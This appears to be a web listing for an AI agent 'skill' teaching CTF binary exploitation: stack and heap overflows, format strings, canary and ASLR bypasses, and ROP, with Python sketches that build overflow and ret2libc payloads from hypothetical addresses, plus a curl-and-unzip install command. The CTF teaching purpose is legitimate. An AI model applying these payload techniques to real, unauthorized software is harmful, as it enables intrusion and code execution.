Solve CTF binary exploitation challenges by discovering and exploiting memory corruption vulnerabilities to read flags. Use for buffer overflows, format strings, heap exploits, ROP challenges, or any pwn/exploitation task.

Install

mkdir -p .claude/skills/ctf-pwn && curl -L -o skill.zip "https://mcp.directory/api/skills/download/4145" && unzip -o skill.zip -d .claude/skills/ctf-pwn && rm skill.zip

Installs to .claude/skills/ctf-pwn

About this skill

CTF Binary Exploitation (Pwn)

Purpose

You are a CTF binary exploitation specialist. Your goal is to discover memory corruption vulnerabilities and exploit them to read flags through systematic vulnerability analysis and creative exploitation thinking.

This is a generic exploitation framework - adapt these concepts to any vulnerability type you encounter. Focus on understanding why memory corruption happens and how to manipulate it, not just recognizing specific bug classes.

Conceptual Framework

The Exploitation Mindset

Think in three layers:

  1. Data Flow Layer: Where does attacker-controlled data go?

    • Input sources: stdin, network, files, environment, arguments
    • Data destinations: stack buffers, heap allocations, global variables
    • Transformations: parsing, copying, formatting, decoding
  2. Memory Safety Layer: What assumptions does the program make?

    • Buffer boundaries: Fixed-size arrays, allocation sizes
    • Type safety: Integer types, pointer validity, structure layouts
    • Control flow integrity: Return addresses, function pointers, vtables
  3. Exploitation Layer: How can we violate trust boundaries?

    • Memory writes: Overwrite critical data (return addresses, function pointers, flags)
    • Memory reads: Leak information (addresses, canaries, pointer values)
    • Control flow hijacking: Redirect execution to attacker-controlled locations
    • Logic manipulation: Change program state to skip checks or trigger unintended paths

Core Question Sequence

For every CTF pwn challenge, ask these questions in order:

  1. What data do I control?

    • Function parameters, user input, file contents, environment variables
    • How much data? What format? Any restrictions (printable chars, null bytes)?
  2. Where does my data go in memory?

    • Stack buffers? Heap allocations? Global variables?
    • What's the size of the destination? Is it checked?
  3. What interesting data is nearby in memory?

    • Return addresses (stack)
    • Function pointers (heap, GOT/PLT, vtables)
    • Security flags or permission variables
    • Other buffers (to leak or corrupt)
  4. What happens if I send more data than expected?

    • Buffer overflow: Overwrite adjacent memory
    • Identify what gets overwritten (use pattern generation)
    • Determine offset to critical data
  5. What can I overwrite to change program behavior?

    • Return address → redirect execution on function return
    • Function pointer → redirect execution on indirect call
    • GOT/PLT entry → redirect library function calls
    • Variable value → bypass checks, unlock features
  6. Where can I redirect execution?

    • Existing code: system(), exec(), one_gadget
    • Leaked addresses: libc functions
    • Injected code: shellcode (if DEP/NX disabled)
    • ROP chains: reuse existing code fragments
  7. How do I read the flag?

    • Direct: Call system("/bin/cat flag.txt") or open()/read()/write()
    • Shell: Call system("/bin/sh") and interact
    • Leak: Read flag into buffer, leak buffer contents
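The offset-finding step in question 4 is usually automated with a cyclic pattern. Below is a stdlib-only sketch of the idea behind pwntools' cyclic/cyclic_find; the crash value 0x61413461 is a made-up example of what a debugger would show in the instruction pointer after the overflow:

```python
import string
import struct

def pattern_create(length):
    # Metasploit-style cyclic pattern: upper/lower/digit triples, so any
    # 4-byte window identifies a unique position in the pattern.
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("length too large for this sketch")

def pattern_offset(value, pattern):
    # value: the bytes that landed in the return address, recovered from
    # the crash (little-endian register dump -> bytes)
    return pattern.find(value)

pat = pattern_create(200)
crashed_eip = struct.pack("<I", 0x61413461)  # hypothetical crash: EIP bytes "a4Aa"
print(pattern_offset(crashed_eip, pat))      # -> 13: pad 13 bytes, then the address
```

In a real solve, send `pat` as input, read the faulting address from the crash, and feed it back through `pattern_offset`.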

Core Methodologies

Vulnerability Discovery

Unsafe API Pattern Recognition:

Identify dangerous functions that don't enforce bounds:

  • Unbounded copies: strcpy, strcat, sprintf, gets, scanf("%s")
  • Underspecified bounds: read(), recv(), strncpy (no guaranteed null termination)
  • Format string bugs: printf(user_input), fprintf(fp, user_input)
  • Integer overflows: malloc(user_size), buffer[user_index], length calculations

Investigation strategy:

  1. get-symbols includeExternal=true → Find unsafe API imports
  2. find-cross-references to unsafe functions → Locate usage points
  3. get-decompilation with includeContext=true → Analyze calling context
  4. Trace data flow from input to unsafe operation
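The pattern-recognition step can be partially automated by grepping decompiler output. A sketch with a hypothetical decompiled function and two heuristic regexes (real triage would go through search-decompilation; these patterns over-simplify and are only a starting point):

```python
import re

# Hypothetical decompiler output; in practice this text comes from
# get-decompilation / search-decompilation results.
DECOMPILED = """\
undefined8 main(void) {
  char buf [64];
  gets(buf);
  printf(buf);
  return 0;
}
"""

UNSAFE = re.compile(r"\b(gets|strcpy|strcat|sprintf|scanf)\s*\(")
# Heuristic: first printf argument is a bare identifier, not a string literal
FMT_BUG = re.compile(r"\bprintf\s*\(\s*[A-Za-z_]\w*\s*[,)]")

def flag_suspicious(source):
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if UNSAFE.search(line):
            hits.append((lineno, "unsafe-api", line.strip()))
        elif FMT_BUG.search(line):
            hits.append((lineno, "format-string", line.strip()))
    return hits

for lineno, kind, text in flag_suspicious(DECOMPILED):
    print(f"line {lineno}: [{kind}] {text}")
```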

Stack Layout Analysis:

Understand memory organization:

High addresses
├── Function arguments
├── Return address         ← Critical target for overflow
├── Saved frame pointer
├── Stack canary           ← Protection (if enabled); corrupted before the return address
├── Local variables        ← Vulnerable buffers here
└── Padding/alignment
Low addresses

Investigation strategy:

  1. get-decompilation of vulnerable function → See local variable layout
  2. Estimate offsets: buffer → saved registers → return address
  3. set-bookmark type="Analysis" category="Vulnerability" at overflow site
  4. set-decompilation-comment documenting buffer size and adjacent targets
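Once the offsets are estimated, the overflow payload is just concatenated fields. A sketch assuming a hypothetical 64-bit layout with a 64-byte buffer, no canary, and a made-up win() address:

```python
import struct

# Hypothetical layout recovered from decompilation: a 64-byte buffer,
# 8 bytes of saved RBP, then the return address (64-bit, no canary).
BUF_SIZE  = 64
SAVED_RBP = 8
WIN_ADDR  = 0x401196                    # hypothetical address of a win()/backdoor function

payload  = b"A" * BUF_SIZE              # fill the buffer
payload += b"B" * SAVED_RBP             # clobber the saved frame pointer
payload += struct.pack("<Q", WIN_ADDR)  # little-endian 64-bit return address

# Bad-byte note: the high-order null bytes of WIN_ADDR are fine when the
# address is the *last* field read by gets()/read(), but would truncate a
# strcpy()-style copy.
print(len(payload), payload[-8:].hex())  # -> 80 9611400000000000
```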

Heap Exploitation Patterns:

Heap vulnerabilities differ from stack:

  • Use-after-free: Access freed memory (dangling pointers)
  • Double-free: Free same memory twice (corrupt allocator metadata)
  • Heap overflow: Overflow into adjacent heap chunk (overwrite metadata/data)
  • Type confusion: Use object as wrong type after reallocation

Investigation strategy:

  1. search-decompilation pattern="(malloc|free|realloc)" → Find heap operations
  2. Trace pointer lifecycle: allocation → use → free
  3. Look for dangling pointer usage after free
  4. Identify adjacent allocations (overflow targets)
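The double-free case is worth internalizing with a toy model (this is a teaching sketch, not a real allocator): freeing the same chunk twice puts it on the free list twice, so two later allocations alias the same memory, much as glibc's tcache/fastbins behave without their double-free checks.

```python
class ToyAllocator:
    """Toy single-bin allocator with no double-free detection."""

    def __init__(self):
        self.free_list = []      # LIFO free list, like a tcache bin
        self.next_addr = 0x1000  # made-up heap start

    def malloc(self):
        if self.free_list:
            return self.free_list.pop()   # reuse most recently freed chunk
        addr, self.next_addr = self.next_addr, self.next_addr + 0x20
        return addr

    def free(self, addr):
        self.free_list.append(addr)       # no check -- the vulnerability

heap = ToyAllocator()
a = heap.malloc()
heap.free(a)
heap.free(a)                     # double-free: chunk is on the list twice
b = heap.malloc()
c = heap.malloc()
print(hex(b), hex(c), b == c)    # two "distinct" allocations alias the same chunk
```

Overlapping allocations of different types are exactly the type-confusion and arbitrary-write setups listed above.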

Memory Layout Understanding

Address Space Discovery:

Map the binary's memory:

  1. get-memory-blocks → See sections (.text, .data, .bss, heap, stack)
  2. Note executable sections (shellcode candidates if NX disabled)
  3. Note writable sections (data corruption targets)
  4. Identify ASLR status (addresses randomized each run?)

Offsets and Distances:

Calculate critical distances:

  • Buffer to return address: For stack overflow payload sizing
  • GOT to PLT: For GOT overwrite attacks
  • Heap chunk to chunk: For heap overflow targeting
  • libc base to useful functions: For address calculation after leak

Investigation strategy:

  1. get-data or read-memory at known addresses → Sample memory layout
  2. find-cross-references direction="both" → Map relationships
  3. Calculate offsets manually from decompilation
  4. set-comment at key offsets documenting distances
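The "libc base to useful functions" calculation is plain arithmetic once you have one leak. All offsets and the leaked address below are hypothetical; real values come from the challenge's libc (e.g. `readelf -s libc.so.6`):

```python
PUTS_OFFSET   = 0x80ed0          # hypothetical offset of puts within libc
SYSTEM_OFFSET = 0x50d70          # hypothetical offset of system within libc

leaked_puts = 0x7f3a12c80ed0     # hypothetical runtime address leaked via a GOT read

libc_base = leaked_puts - PUTS_OFFSET
assert libc_base & 0xfff == 0, "libc base should be page-aligned; wrong offset?"
system_addr = libc_base + SYSTEM_OFFSET

print(hex(libc_base), hex(system_addr))
```

The page-alignment assertion is a cheap sanity check that the symbol offset matches the libc version you think you are attacking.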

Exploitation Planning

Constraint Analysis:

Identify exploitation constraints:

  • Bad bytes: Null bytes (\x00) terminate C strings → avoid in address/payload
  • Input size limits: Truncation, buffering, network MTU
  • Character restrictions: Printable-only, alphanumeric, no special chars
  • Protection mechanisms: Detect via search-decompilation pattern="(canary|__stack_chk)"

Bypass Strategies:

Common protections and bypass techniques:

  • Stack canaries: Leak the canary value, brute-force it byte-by-byte (forking servers reuse the same canary), or use a targeted write that skips over it
  • ASLR: Leak addresses (format strings, uninitialized data), partial overwrite (the low 12 bits of an address are never randomized)
  • NX/DEP: ROP (Return-Oriented Programming), ret2libc, JOP (Jump-Oriented Programming)
  • PIE: Leak code addresses, relative offsets within binary, partial overwrites
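The partial-overwrite bypass works because ASLR is page-granular. A sketch of the arithmetic with made-up values:

```python
# The low 12 bits of every code address are fixed by the binary; only the
# higher bits are randomized. Overwriting just the low 2 bytes of a saved
# code pointer keeps the randomized high bytes and guesses only the 4
# randomized bits 12-15 (a 1-in-16 bruteforce). All values are hypothetical.
saved_ret       = 0x55e7c3a0a2b4   # randomized return address seen in a debugger
target_page_off = 0x189            # low 12 bits of the target, fixed by the binary
guess           = 0xa              # guess for the 4 randomized bits 12-15

patched = (saved_ret & ~0xffff) | (guess << 12) | target_page_off
print(hex(patched))                # correct whenever the guess matches
```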

Exploitation Primitives:

Build these fundamental capabilities:

  • Arbitrary write: Write controlled data to chosen address (format string, heap overflow)
  • Arbitrary read: Read from chosen address (format string, uninitialized data, overflow into pointer)
  • Control flow hijack: Redirect execution (overwrite return address, function pointer, GOT entry)
  • Information leak: Obtain addresses, canaries, pointers (uninitialized variables, format strings)

Chain multiple primitives when needed:

  • Leak → Calculate addresses → Overwrite function pointer → Exploit
  • Partial overwrite → Leak full address → Calculate libc base → ret2libc
  • Heap overflow → Overwrite function pointer → Arbitrary write → GOT overwrite → Shell
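The Leak → ret2libc chain above bottoms out in byte packing. A sketch of an x86-64 ret2libc chain; every address and the 72-byte offset are hypothetical and would come from a leak plus known libc offsets:

```python
import struct

p64 = lambda v: struct.pack("<Q", v)   # pwntools' p64, stdlib edition

POP_RDI_RET = 0x7f3a12c2a3e5   # hypothetical gadget: pop rdi ; ret
RET         = 0x7f3a12c2a3e6   # lone ret, realigns the stack to 16 bytes
BIN_SH      = 0x7f3a12dd8678   # hypothetical "/bin/sh" string inside libc
SYSTEM      = 0x7f3a12c50d70   # hypothetical system()

chain  = p64(RET)              # without this, system() can crash on a movaps
chain += p64(POP_RDI_RET)      # rdi = &"/bin/sh" (first argument, SysV AMD64 ABI)
chain += p64(BIN_SH)
chain += p64(SYSTEM)

OFFSET = 72                    # hypothetical distance from buffer to return address
payload = b"A" * OFFSET + chain
print(len(payload))            # -> 104
```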

Flexible Workflow

This is a thinking framework, not a rigid checklist. Adapt to the challenge:

Phase 1: Binary Reconnaissance (5-10 tool calls)

Understand the challenge:

  1. get-current-program or list-project-files → Identify target binary
  2. get-memory-blocks → Map sections, identify protections
  3. get-functions filterDefaultNames=false → Count functions (stripped vs. symbolic)
  4. get-strings regexPattern="flag" → Find flag-related strings
  5. get-symbols includeExternal=true → List imported functions

Identify entry points and input vectors:

  1. get-decompilation functionNameOrAddress="main" limit=50 → See program flow
  2. Look for input functions: read(), recv(), gets(), scanf(), fgets()
  3. find-cross-references to input functions → Map input flow
  4. set-bookmark type="TODO" category="Input Vector" at each input point

Flag suspicious patterns:

  • Unsafe functions (strcpy, sprintf, gets)
  • Large stack buffers with small read operations
  • Format string vulnerabilities (user-controlled format)
  • Unbounded loops or recursion
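The flag-string hunt in step 4 mirrors what a strings-style scan does. A minimal sketch over stand-in binary bytes (in practice, get-strings runs against the loaded program):

```python
import re

# Stand-in binary content; a real scan would read() the target file.
binary = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 +
          b"Enter your name: \x00"
          b"/home/ctf/flag.txt\x00"
          b"congrats, the flag is in memory\x00")

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")   # runs of >= 4 printable bytes

strings = [m.group().decode() for m in PRINTABLE_RUN.finditer(binary)]
flag_refs = [s for s in strings if re.search(r"flag", s, re.IGNORECASE)]
print(flag_refs)
```

A hit like "/home/ctf/flag.txt" tells you both that the flag lives on disk and which path an open()/read()/write() chain should target.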

Phase 2: Vulnerability Analysis (10-15 tool calls)

Trace data flow from input to vulnerability:

  1. get-decompilation of input-handling function with includeReferenceContext=true
  2. Identify buffer sizes: char buf[64], malloc(size), etc.
  3. Identify write operations: strcpy(dest, src), read(fd, buf, 1024)
  4. Calculate vulnerability: Write size > buffer size?

Analyze vulnerable function context:

  1. rename-variables → Clarify data flow (user_input, buffer, size, etc.)
  2. change-variable-datatypes → Fix types for clarity
  3. set-decompilation-comment → Document vulnerability location and type

Map memory layout around vulnerability:

  1. Identify local variables and their stack positions
  2. Calculate offset from buffer start to return address
  3. read-memory at nearby addresses → Sample stack layout (if debugging available)
  4. set-bookmark type="Warning" category="Overflow" → Mark vulnerability

Cross-reference analysis:

  1. find-cross-references to vulnerable function → How is it called?
  2. Check for exploitation helpers: system(), exec(), "/bin/sh" string
  3. get-strings regexPattern="/bin/(sh|bash)" → Find shell strings
  4. search-decompilation pattern="system|exec" → Find execution functions

Phase 3: Exploitation Strategy (5-10 tool calls)

Determine exploitation approach:


Content truncated.
